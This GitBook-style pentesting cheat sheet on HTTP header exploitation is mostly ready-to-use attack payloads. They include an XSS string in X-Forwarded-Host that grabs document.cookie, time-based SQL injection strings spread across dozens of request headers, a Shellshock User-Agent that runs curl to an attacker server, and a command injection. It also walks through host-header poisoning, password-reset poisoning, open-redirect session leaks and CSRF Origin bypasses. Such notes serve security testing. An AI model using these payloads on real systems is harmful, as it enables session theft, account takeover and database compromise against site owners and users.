HTTP Header Exploitation

Request Header payloads (xss, SQLi, etc.)

Misused or improperly validated headers can lets an attacker:

Bypass login flows
Steal sessions
Hijack OAuth tokens
Abuse password reset links
Trick backend logic

Referer: Tells the server which page the request came from
Origin: Specifies the domain where the request originated
Host: Indicates the target host being requested

Basic Payload

X-Forwarded-Host: evil.com"><img src/onerror=prompt(document.cookie)>

X-Forwarded-Host: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z

X-Forwarded-For: 0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z

Referer: https://site.com/'+(select*from(select(sleep(10)))a)+'

Cookie: 'XOR(if(now()=sysdate(),sleep(10),0))XOR'

User-Agent: "XOR(if(now()=sysdate(),sleep(10),0))XOR"

GitHub - c0dejump/HExHTTP: Header Exploitation HTTPGitHub

Testing

Change the host header

GET /index.php HTTP/1.1
Host: evil-website.com
...

Duplicating the host header

GET /index.php HTTP/1.1
Host: vulnerable-website.com
Host: evil-website.com
...

Add line wrapping

GET /index.php HTTP/1.1
 Host: vulnerable-website.com
Host: evil-website.com
...

Add host override headers

X-Forwarded-For: evil-website.com
X-Forwarded-Host: evil-website.com
X-Client-IP: evil-website.com
X-Remote-IP: evil-website.com
X-Remote-Addr: evil-website.com
X-Host: evil-website.com

How to use? In this case im using "X-Forwarded-For : evil.com"

GET /index.php HTTP/1.1
Host: vulnerable-website.com
X-Forwarded-For : evil-website.com
...

Supply an absolute URL

GET https://vulnerable-website.com/ HTTP/1.1
Host: evil-website.com
...

XSS

Blind XX

XSS

Command Injection

User-Agent: () { :; }; /bin/bash -c 'curl http://your-server.com'
X-Forwarded-For: 127.0.0.1; id

SQLi

Accept: "' or sleep(30)='"
Accept-Charset: "' or sleep(30)='"
Accept-Datetime: "' or sleep(30)='"
Accept-Encoding: "' or sleep(30)='"
Accept-Language: "' or sleep(30)='"
Authorization: "' or sleep(30)='"
Cache-Control: "' or sleep(30)='"
Connection: "' or sleep(30)='"
Content-Length: "' or sleep(30)='"
Content-MD5: "' or sleep(30)='"
Content-Type: "' or sleep(30)='"
Cookie: "' or sleep(30)='"
Date: "' or sleep(30)='"
Expect: "' or sleep(30)='"
Forwarded: "' or sleep(30)='"
From: "' or sleep(30)='"
If-Match: "' or sleep(30)='"
If-Modified-Since: "' or sleep(30)='"
If-None-Match: "' or sleep(30)='"
If-Range: "' or sleep(30)='"
If-Unmodified-Since: "' or sleep(30)='"
Max-Forwards: "' or sleep(30)='"
Origin: "' or sleep(30)='"
Pragma: "' or sleep(30)='"
Proxy-Authorization: "' or sleep(30)='"
Range: "' or sleep(30)='"
Referer: "' or sleep(30)='"
TE: "' or sleep(30)='"
Upgrade: "' or sleep(30)='"
User-Agent: "' or sleep(30)='"
Via: "' or sleep(30)='"
Warning: "' or sleep(30)='"
X-Client-IP: "' or sleep(30)='"
X-Remote-IP: "' or sleep(30)='"
X-Remote-Addr: "' or sleep(30)='"
X-Forwarded-For: "' or sleep(30)='"
X-Originating-IP: "' or sleep(30)='"
X-Host: "' or sleep(30)='"
X-Forwarde-Host: "' or sleep(30)='"

Time Based SQLi

GitHub - danialhalo/SqliSniper: Advanced Time-based Blind SQL Injection fuzzer for HTTP HeadersGitHub

#BugBounty —” Database hacked of India’s Popular Sports company”-Bypassing Host Header to SQL…Medium

Open Redirect + Referer → Session Leak

Open Redirection

Scenario

A login page redirects users after authentication.
The Referer header is used to determine the “safe” redirect destination.
But there’s no validation on it.

Exploit Flow

Attacker sends victim to a login link with a crafted Referer like evil.com.
Server blindly trusts the header and sends a redirect to that external domain.
If session tokens or SSO codes are passed along, they’re exposed.

OAuth / Okta Misconfiguration

Host Header Injection → Password Reset Poisoning

Password Reset

Scenario

A password reset link is emailed to the user.
The link is constructed using the Host header.

Exploit Flow

Attacker intercepts a password reset request (or initiates it on behalf of a user).
They modify the Host header to their domain: evil.com.
The server builds the reset link like: https://evil.com/reset?token=abcd1234
The user receives this link and clicks it, revealing the reset token to the attacker.

CSRF + Origin Header Bypass

CSRF

Scenario

A server uses Origin header to validate POST requests.
But it only partially matches or ignores subdomains.

Exploit Flow

The server expects Origin: https://example.com.
Attacker sends Origin: https://evil.example.com — which still passes.
CSRF protections are bypassed.

Try bypassing Origin and Referer checks with:

Similar subdomains
Capitalization
Multiple headers (e.g., X-Origin, X-Forwarded-Host)

Tool

GitHub - c0dejump/HExHTTP: Header Exploitation HTTPGitHub

Resources

HTTP header hacks: basic and advanced exploit techniques exploredYesWeHack

Hidden in Headers: The Power of Misused Referer, Origin, and Host HeadersMedium

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

The Web Application Hacker’s Handbook The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Real-World Bug Hunting: A Field Guide to Web Hacking Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

PreviousHTTP Verb Tampering NextHTTP Request Smuggling

Last updated 6 months ago